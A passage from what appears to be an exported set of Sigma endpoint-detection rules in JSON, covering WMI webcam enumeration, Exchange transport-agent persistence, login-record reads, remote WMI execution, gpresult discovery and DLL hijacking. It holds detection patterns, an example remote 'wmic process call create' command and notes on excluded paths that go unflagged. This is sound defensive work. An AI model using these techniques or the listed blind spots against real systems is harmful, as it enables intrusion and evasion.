- 'PNPClass'\n - 'Camera'\n\n condition: selection\nlevel: medium\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "87b85835-9289-4adc-bac4-c9cea4811f93",
"rule_name": "PnP Webcams Enumerated via PowerShell",
"rule_description": "Detects the execution of a PowerShell command that enumerates plug-and-play webcams, i.e. a command line containing a SELECT * FROM Win32_PnPEntity WMI query together with the PNPClass and Camera keywords.\nAttackers may use it during the discovery phase to learn which devices are attached to the host.\nThis technique was observed in the DCRat (Dark Crystal RAT) backdoor, which enumerates the cameras attached to the compromised host.\nIt is recommended to investigate the process responsible for the script execution as well as its ancestors to look for malicious content or actions.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-01-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery",
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1592.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "87d2cc4e-582f-4778-8944-25baff8859eb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.071773Z",
"creation_date": "2026-03-23T11:45:34.071775Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.071779Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf",
"https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook",
"https://attack.mitre.org/techniques/T1505/002/"
],
"name": "t1505_002_new_exchange_transport_agent_enabled_powershell.yml",
"content": "title: New Exchange TransportAgent Enabled via PowerShell\nid: 87d2cc4e-582f-4778-8944-25baff8859eb\ndescription: |\n Detects the enabling of a new TransportAgent on an Exchange server via PowerShell.\n Attackers can use this technique to achieve persistence on an Exchange server by installing a malicious DLL as a new TransportAgent.\n The malicious DLL also has access to emails transiting through the Exchange, and can also act as a command and control component.\n It is recommended to investigate the newly installed transport agent for malicious content.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf\n - https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook\n - https://attack.mitre.org/techniques/T1505/002/\ndate: 2022/11/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1505.002\n - attack.command_and_control\n - attack.t1104\n - attack.t1071.003\n - attack.defense_evasion\n - attack.t1546.008\n - attack.collection\n - attack.t1114.002\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.ConfigChange\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.Collection\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection:\n PowershellCommand|contains: 'Enable-TransportAgent '\n\n exclusion_exchange_setup:\n ProcessOriginalFileName: 'ExSetupUI.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_programfiles:\n ProcessImage|startswith:\n - '?:\\program files\\'\n - '?:\\program files (x86)\\'\n\n exclusion_dkimsigner:\n ProcessImage|endswith: '\\configuration.dkimsigner.exe'\n ProcessDescription: 'DKIM Signing Configuration'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "87d2cc4e-582f-4778-8944-25baff8859eb",
"rule_name": "New Exchange TransportAgent Enabled via PowerShell",
"rule_description": "Detects the enabling of a transport agent on an Exchange server via the Enable-TransportAgent PowerShell cmdlet.\nAttackers can use this technique to achieve persistence on an Exchange server by registering a malicious DLL as a new transport agent.\nSuch a DLL also has access to every email transiting through the Exchange server and can act as a command and control component, as documented for the LightNeuron backdoor.\nNote that the Exchange setup program (ExSetupUI.exe), any process running from Program Files and the DKIM signer configuration tool are excluded, so legitimate installers are not flagged, but neither is a tool an attacker has placed under Program Files.\nIt is recommended to investigate the newly enabled transport agent and its assembly for malicious content, and to determine who ran the command.\n",
"rule_creation_date": "2022-11-08",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.command_and_control",
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1071.003",
"attack.t1104",
"attack.t1114.002",
"attack.t1505.002",
"attack.t1546.008"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "87d7c639-91d6-4395-a982-e2f01a0e9a71",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.564095Z",
"creation_date": "2026-03-23T11:45:34.622074Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622079Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1033/",
"https://attack.mitre.org/techniques/T1087/001/"
],
"name": "t1033_login_records_read_linux.yml",
"content": "title: Suspicious Read of Login Records\nid: 87d7c639-91d6-4395-a982-e2f01a0e9a71\ndescription: |\n Detects a suspicious attempt to read any of the login records: /var/run/utmp, /var/log/wtmp or /var/log/btmp.\n Attackers may use it during discovery phase to retrieving information about the running system.\n - /var/run/utmp maintains a full accounting of the current status of the system, system boot time, user logins, logouts, system events etc;\n - /var/log/wtmp acts as a historical utmp;\n - /var/log/btmp records failed login attempts.\n These files are in a binary format and are usually accessed using specific commands but attackers can try and read them directly.\n It is recommended to investigate the process performing this action to determine its legitimacy and look for other suspicious activities related to this process.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\n - https://attack.mitre.org/techniques/T1087/001/\ndate: 2023/12/15\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - attack.t1087.001\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n Kind: 'access'\n Permissions: 'read'\n Path:\n - '/var/run/utmp'\n - '/var/log/wtmp'\n - '/var/log/btmp'\n ProcessImage|contains: '?'\n ProcessParentImage|contains: '?'\n\n filter_system_bin:\n ProcessImage:\n - '/usr/bin/last'\n - '/usr/bin/lastlog'\n - '/usr/bin/systemd-tmpfiles'\n - '/bin/login'\n - '/usr/bin/login'\n - '/bin/su'\n - '/usr/bin/su'\n - '/usr/bin/logrotate'\n - '/usr/sbin/logrotate'\n - '/usr/bin/lslogins'\n - '/bin/systemd-tmpfiles'\n - '/usr/bin/lsattr'\n\n exclusion_common:\n ProcessImage:\n - '/usr/bin/tail'\n - '/usr/bin/file'\n - '/bin/grep'\n - '/usr/bin/grep'\n - '/usr/bin/ac'\n - '/usr/bin/rsync'\n - '/bin/tar'\n - '/usr/bin/tar'\n - '/usr/sbin/crond' # /usr/sbin/crond -n\n - 
'/lib/systemd/systemd-update-utmp'\n - '/usr/lib/systemd/systemd-update-utmp'\n - '/usr/lib/systemd/systemd-readahead'\n - '/usr/bin/clamscan'\n - '/usr/sbin/clamd'\n - '/usr/libexec/cockpit-session'\n - '/usr/lib/cockpit/cockpit-session'\n - '/usr/sbin/lightdm'\n - '/usr/libexec/gdm-session-worker'\n - '/usr/lib/accounts-daemon'\n - '/usr/libexec/accounts-daemon'\n - '/usr/lib/accountsservice/accounts-daemon'\n - '/nix/store/*-accountsservice-*/libexec/accounts-daemon'\n - '/usr/sbin/vsep'\n - '/usr/bin/mksquashfs'\n - '/usr/bin/syft'\n - '/usr/lib/openssh/sshd-session'\n - '/usr/bin/rg'\n - '/usr/bin/gzip'\n - '/usr/sbin/agetty'\n - '/usr/bin/lightdm'\n - '/usr/bin/nautilus'\n\n exclusion_ssh:\n ProcessImage:\n - '/usr/sbin/sshd'\n - '/usr/local/libexec/sshd-session'\n - '/usr/libexec/openssh/sshd-session'\n\n exclusion_auditbeat:\n ProcessImage: '/usr/share/auditbeat/bin/auditbeat'\n\n exclusion_tina:\n ProcessCommandLine|startswith:\n - '/tina/timenavigator/tina/bin/'\n - '/usr/tina/timenavigator/tina/bin/'\n\n exclusion_bacula:\n ProcessImage:\n - '/usr/sbin/bacula-fd'\n - '/opt/bacula/bin/bacula-fd'\n\n exclusion_fsecure:\n - ProcessImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - '/opt/f-secure/fsbg/bin/'\n - '/opt/f-secure/atlant/fsbg/bin/'\n - ProcessParentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n - ProcessGrandparentImage|startswith:\n - '/opt/f-secure/linuxsecurity/'\n - '/opt/f-secure/baseguard/'\n\n exclusion_wazuh:\n - ProcessParentImage: '/var/ossec/bin/wazuh-logcollector'\n - ProcessGrandparentImage: '/var/ossec/bin/wazuh-logcollector'\n\n exclusion_aide:\n ProcessImage: '/usr/bin/aide'\n\n exclusion_chkrootkit:\n ProcessImage:\n - '/usr/lib/chkrootkit/chklastlog'\n - '/usr/lib/chkrootkit/chkwtmp'\n\n exclusion_lacework_datacollector:\n # /var/lib/lacework/6.11.0.21858/datacollector\n # /var/lib/lacework/6.7.6.19823/datacollector\n ProcessImage: 
'/var/lib/lacework/*/datacollector'\n\n exclusion_docker:\n - ProcessImage: '/usr/bin/dockerd'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/usr/bin/runc|/usr/bin/dockerd|'\n\n exclusion_bmc:\n ProcessAncestors|contains: '|/opt/bmc/bladelogic/RSCD/bin/rscd_full|'\n\n exclusion_deja-dup:\n ProcessAncestors|startswith: '/usr/bin/deja-dup|'\n\n exclusion_networker:\n ProcessAncestors|startswith: '/usr/sbin/nsrexecd|'\n\n exclusion_image:\n ProcessImage:\n - '/opt/landesk/bin/plugin'\n - '/opt/sentinelone/bin/sentinelone-agent'\n - '/opt/eset/efs/lib/oaeventd'\n - '/opt/eset/efs/lib/odfeeder'\n - '/opt/bitdefender-security-tools/bin/bdsecd'\n - '/usr/local/bin/restic'\n - '/opt/ds_agent/ds_am'\n - '/opt/cybereason/sensor/bin/cbram'\n - '/usr/bin/proxmox-backup-client'\n - '/opt/microsoft/mdatp/sbin/wdavdaemon'\n - '/opt/endpoint-agent/agent' # sekoia agent\n - '/opt/nagiosagent/*/perl/bin/perl'\n - '/opt/McAfee/ens/tp/bin/mfetpd'\n - '/opt/traps/bin/pmd'\n - '/kaniko/executor'\n - '/opt/altiris/notification/nsagent/bin/aex-pluginmanager.bin'\n - '/opt/Elastic/Agent/data/elastic-agent-*/components/osqueryd'\n - '/opt/eGambit/das/dasc'\n - '/usr/Atempo/TimeNavigator/tina/Bin/*'\n - '/usr/local/Atempo/TimeNavigator/tina/Bin/*'\n - '/opt/commvault/iDataAgent64/clBackup'\n - '/usr/local/avamar/bin/avtar.bin'\n - '/opt/sophos-av/engine/_/savscand.?'\n - '/usr/openv/netbackup/bin/bpbkar'\n - '/opt/omni/lbin/vbda'\n - '/opt/dynatrace/oneagent/agent/lib64/oneagentos'\n - '/opt/tivoli/tsm/client/ba/bin/dsmc'\n - '/usr/local/sbin/proxmox-backup-client'\n - '/opt/forticlient/epctrl'\n - '/opt/forticlient/scanunit'\n - '/opt/NAI/LinuxShield/libexec/nailsd'\n - '/opt/f-secure/fsbg/bin/statusd'\n - '/opt/Tanium/TaniumClient/TaniumCX'\n - '/var/lib/rancher/k3s/data/*/bin/k3s'\n - '/opt/CrowdStrike/falcon-sensor*'\n - '/opt/Atempo/HN/bin/HNagent'\n - '/opt/Druva/EnterpriseWorkloads/bin/PhoenixFSDtBackupAgent'\n - '/usr/NX/bin/nxexec'\n - 
'/opt/splunkforwarder/bin/splunkd'\n - '/var/opt/kaspersky/kesl/*/opt/kaspersky/kesl/libexec/kesl'\n - '/usr/local/bin/filebrowser'\n - '/opt/dynatrace/agent/lib64/oneagentos'\n - '/opt/forticlient/webfilter'\n - '/usr/sbin/cbdaemon'\n - '/opt/a5000/infra/utd/*' # Mitel\n\n exclusion_template_ansible:\n - ProcessCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/AnsiballZ_*.py'\n - ProcessParentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentCommandLine:\n - '/bin/sh -c /usr/bin/python* && sleep 0'\n - '/bin/sh -c /usr/libexec/platform-python && sleep 0'\n - '/bin/sh -c LANG=C /usr/bin/python* && sleep 0'\n - '/bin/sh -c LANG=C /usr/libexec/platform-python && sleep 0'\n - ProcessGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentParentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? ; '\n - ProcessGrandparentGrandparentCommandLine|contains:\n - '(mitogen:*@*:*)'\n - '/tmp/ansible-tmp-??????????.*/ansiballz_*.py'\n - '/bin/sh -c echo BECOME-SUCCESS-???????????????????????????????? 
; '\n\n exclusion_cron:\n ProcessAncestors|contains: '|/usr/sbin/crond|'\n\n exclusion_grafana:\n ProcessImage: '/usr/bin/alloy'\n\n exclusion_jumpcloud:\n ProcessParentImage: '/opt/jc/bin/jumpcloud-agent'\n\n exclusion_trendmicro:\n ProcessCommandLine|startswith: '/opt/ds_agent/ds_am '\n\n exclusion_borg:\n ProcessCommandLine|startswith: '/usr/bin/python* /usr/bin/borg '\n\n exclusion_pacemaker:\n ProcessAncestors|contains: '|/usr/sbin/pacemakerd|'\n\n exclusion_dolphin:\n ProcessImage|endswith: '/kioworker'\n ProcessParentImage: '/usr/bin/dolphin'\n\n exclusion_restic:\n ProcessCommandLine|contains: '/bin/restic backup '\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "87d7c639-91d6-4395-a982-e2f01a0e9a71",
"rule_name": "Suspicious Read of Login Records",
"rule_description": "Detects a suspicious read of any of the login records: /var/run/utmp, /var/log/wtmp or /var/log/btmp.\nAttackers may read them during the discovery phase to retrieve information about the running system and its users (which accounts logged in and when).\n - /var/run/utmp maintains a full accounting of the current status of the system: boot time, user logins and logouts, system events, etc.;\n - /var/log/wtmp acts as a historical utmp;\n - /var/log/btmp records failed login attempts.\nThese files are in a binary format and are usually accessed through dedicated commands (last, lastlog, lslogins, login, su, ...), which are filtered out; attackers may instead read them directly or with generic tools.\nA long list of backup, security and management agents is excluded, as is any process descending from crond or launched through Ansible; reads from such contexts will not alert, so a cron-based or configuration-management-based foothold must be checked by other means.\nIt is recommended to investigate the process performing this action to determine its legitimacy and look for other suspicious activities related to this process.\n",
"rule_creation_date": "2023-12-15",
"rule_modified_date": "2026-03-23",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1087.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "87f583d1-ca80-4cc4-bd29-8bb2d2fced2f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.073122Z",
"creation_date": "2026-03-23T11:45:34.073124Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.073129Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/",
"https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmic",
"https://attack.mitre.org/techniques/T1047/",
"https://attack.mitre.org/techniques/T1021/006/"
],
"name": "t1021_006_wmi_process_call.yml",
"content": "title: Remote Execution via WMI\nid: 87f583d1-ca80-4cc4-bd29-8bb2d2fced2f\ndescription: |\n Detects the usage of wmic.exe to launch executables on a remote host (process call create with a /node: target).\n This can be used by an attacker to move laterally within an organisation, or by a malicious macro to execute further processes on the machine.\n Note that only the wmic.exe command-line client is covered: remote WMI execution performed through other clients (e.g. PowerShell CIM/WMI cmdlets or direct DCOM calls) is not matched by this rule.\n It is recommended to analyze processes launched remotely by WMI to look for malicious content or actions, and to look for further compromised machines by looking for lateral movement-related alerts following this one.\nreferences:\n - https://www.microsoft.com/en-us/security/blog/2023/05/24/volt-typhoon-targets-us-critical-infrastructure-with-living-off-the-land-techniques/\n - https://docs.microsoft.com/en-us/windows/win32/wmisdk/wmic\n - https://attack.mitre.org/techniques/T1047/\n - https://attack.mitre.org/techniques/T1021/006/\ndate: 2021/04/01\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - attack.lateral_movement\n - attack.t1021.006\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n # wmic.exe /node:\"192.168.0.1\" process call create evil.exe\n selection_bin:\n - Image|endswith: '\\wmic.exe'\n - OriginalFileName: 'wmic.exe'\n\n selection_cmd:\n CommandLine|all:\n - '*process *call *create*'\n - '*node:*'\n condition: all of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "87f583d1-ca80-4cc4-bd29-8bb2d2fced2f",
"rule_name": "Remote Execution via WMI",
"rule_description": "Detects the usage of wmic.exe to launch executables on a remote host (process call create with a /node: target).\nThis can be used by an attacker to move laterally within an organisation, or by a malicious macro to execute further processes on the machine.\nNote that only the wmic.exe command-line client is covered: remote WMI execution performed through other clients (e.g. PowerShell CIM/WMI cmdlets or direct DCOM calls) is not matched by this rule.\nIt is recommended to analyze processes launched remotely by WMI to look for malicious content or actions, and to look for further compromised machines by looking for lateral movement-related alerts following this one.\n",
"rule_creation_date": "2021-04-01",
"rule_modified_date": "2025-04-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1021.006",
"attack.t1047"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "884695e9-882c-429d-b67b-6821402eab76",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606131Z",
"creation_date": "2026-03-23T11:45:34.606135Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606142Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
"https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult",
"https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/",
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md#atomic-test-1---display-group-policy-information-via-gpresult",
"https://attack.mitre.org/techniques/T1615/"
],
"name": "t1615_group_policy_discovery_gpresult.yml",
"content": "title: Group Policy Information Discovered via gpresult.exe\nid: 884695e9-882c-429d-b67b-6821402eab76\ndescription: |\n Detects an access to a group policy information using gpresult.\n Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment.\n It is recommended to investigate the execution context of gpresult, as well as to look for other type of malicious behavior on the target host.\nreferences:\n - https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf\n - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/gpresult\n - https://unit42.paloaltonetworks.com/emissary-trojan-changelog-did-operation-lotus-blossom-cause-it-to-evolve/\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md#atomic-test-1---display-group-policy-information-via-gpresult\n - https://attack.mitre.org/techniques/T1615/\ndate: 2022/12/26\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1615\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Discovery\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\gpresult.exe'\n - OriginalFileName: 'gprslt.exe'\n\n selection_commandline:\n CommandLine|contains:\n - '/z' # works with not space between command and argument\n - ' -z'\n\n exclusion_dickinson:\n GrandparentImage: '?:\\Program Files (x86)\\Becton Dickinson\\EpiPreUpgrade\\EpiPreUpgrade.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "884695e9-882c-429d-b67b-6821402eab76",
"rule_name": "Group Policy Information Discovered via gpresult.exe",
"rule_description": "Detects the enumeration of Group Policy information using gpresult.exe with the verbose (/z or -z) option.\nAdversaries may gather information on Group Policy settings to identify paths for privilege escalation, the security measures applied within a domain, and patterns in domain objects that can be manipulated or used to blend into the environment.\nIt is recommended to investigate the execution context of gpresult (parent process, user, command line), as well as to look for other types of malicious behavior on the target host.\n",
"rule_creation_date": "2022-12-26",
"rule_modified_date": "2025-02-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1615"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "885916e7-ab33-491d-b06d-d054d6ba15e6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586776Z",
"creation_date": "2026-03-23T11:45:34.586780Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586787Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_tieringengineservice.yml",
"content": "title: DLL Hijacking via tieringengineservice.exe\nid: 885916e7-ab33-491d-b06d-d054d6ba15e6\ndescription: |\n Detects potential Windows DLL Hijacking via tieringengineservice.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'tieringengineservice.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CLUSAPI.dll'\n - '\\DNSAPI.dll'\n - '\\ESENT.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "885916e7-ab33-491d-b06d-d054d6ba15e6",
"rule_name": "DLL Hijacking via tieringengineservice.exe",
"rule_description": "Detects potential Windows DLL hijacking via tieringengineservice.exe: a Microsoft-signed copy of the executable running outside the Windows system directories and loading CLUSAPI.dll, DNSAPI.dll or ESENT.dll from a non-system path, where the loaded library is itself not signed by Microsoft Windows.\nDLL hijacking takes advantage of the default Windows DLL search order by placing a malicious DLL alongside a victim application that loads it by name.\nAttackers use this technique by copying a legitimate Microsoft-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder, so that it is loaded in place of the genuine library.\nIt is recommended to investigate the loaded library for malicious content (signature, hash, location) and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "885df422-ec8e-4f5d-81dc-26e4d816601f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
